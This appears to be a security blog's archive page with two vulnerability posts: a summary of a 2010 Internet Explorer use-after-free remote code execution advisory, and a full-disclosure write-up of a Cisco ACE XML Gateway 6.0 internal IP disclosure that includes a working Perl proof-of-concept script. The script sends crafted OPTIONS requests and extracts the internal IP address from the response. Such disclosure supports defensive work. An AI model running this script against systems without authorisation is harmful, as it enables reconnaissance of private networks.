Posts Tagged ‘6.0’

Internet Explorer 6-7-8 => Remote Code Execution

Tuesday, January 19th, 2010

Summary:
Microsoft is investigating reports of limited, targeted attacks against customers of Internet Explorer 6, using a vulnerability in Internet Explorer.

Affected:
Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 is not affected, and that Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are vulnerable.

Vulnerability:
The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.
In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.

NOTE: This is the vulnerability used by China hackers to spy and scam Gmail Accounts.

Tags: , , , , , , , , ,
Posted in Articles, Exploits, Hacking, News | Comments Off

Cisco ACE XML Gateway 6.0 internal IP address disclosure

Saturday, September 26th, 2009

Cisco ACE XML Gateway v6.0 Internal IP address disclosure
Discovered in date 24/Aug/2009 by Alejandro Hernandez H. – Full-Disclosure – We believe in it. (Secunia)

The Cisco ACE XML Gateway is a key component of the Cisco Application Control Engine (ACE) family of products. It brings application intelligence into the network and enables efficient deployment of secure, reliable, and accelerated Web service environments based on XML (Extensible Markup Language) and SOAP
(Simple Object Access Protocol) using a shared network infrastructure.
The ACE XML Gateway helps you to secure, manage, monitor, and accelerate an SOA. In a service-oriented environment, the ACE XML Gateway acts as a service virtualization layer. It decouples service providers from consumers, increasing the stability, maintainability, and flexibility of those services. It enforces
security policies and applies business rules, such as routing decisions and content validation processing, across message traffic in the environment. The ACE XML Gateway secures your SOA implementation by providing advanced XML firewall capabilities, with built-in protection against XML-based attacks,
such as SQL injection or entity expansion attacks, content screening capabilities and more.
With a high-performance, streaming XML processing engine, the ACE XML Gateway reduces the performance impact of XML traffic on the network.

Proof of Concept (PoC) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

#!/usr/bin/perl -w
 
use strict;
use Socket qw/ :DEFAULT :crlf /;	# $CRLF
use IO::Socket;
 
sub header
{
	print "  .+==================================+.\n";
	print " /     Cisco ACE XML Gateway <= 6.0     \\\n";
	print "|     Internal IP Address Disclosure     |\n";
	print "|                                        |\n";
	print " \\             -nitr0us-                /\n";
	print "  `+==================================+`\n\n";
}
 
sub usage
{
	header;
	print "Usage: $0 <host> [port(default 80)]\n";
	exit 0xdead;
}
 
my $host = shift || usage;
my $port = shift || 80;
my $axg;
my $axg_response;
my @payloads = ("OPTIONS / HTTP/1.0" . $CRLF . $CRLF, 
				"OPTIONS / HTTP/1.1" . $CRLF . "Host: " . $host . $CRLF . $CRLF);
 
header;
print "[+] Connecting to $host on port $port ...\n";
 
for(@payloads){
	$axg = IO::Socket::INET->new(	PeerAddr	=>	$host,
									PeerPort	=>	$port,
									Proto		=>	'tcp')
		or die "[-] Could not create socket: $!\n";
 
	print "[+] Sending payload  ...\n";
	print $axg $_;
 
	$axg->read($axg_response, 1024);
	print "[+] Parsing response ...\n";
 
	if($axg_response =~ /Client IP: (.*)/){
		print "[+] Internal IP disclosure: $1\n";
		$axg->close();
		exit 0xbabe;
	}
 
	$axg->close();
}
 
print "[-] Not vulnerable !\n";

Tags: , , , , , , , , , ,
Posted in Exploits, Hacking, Infosecurity, News, PoC, Stuffs | Comments Off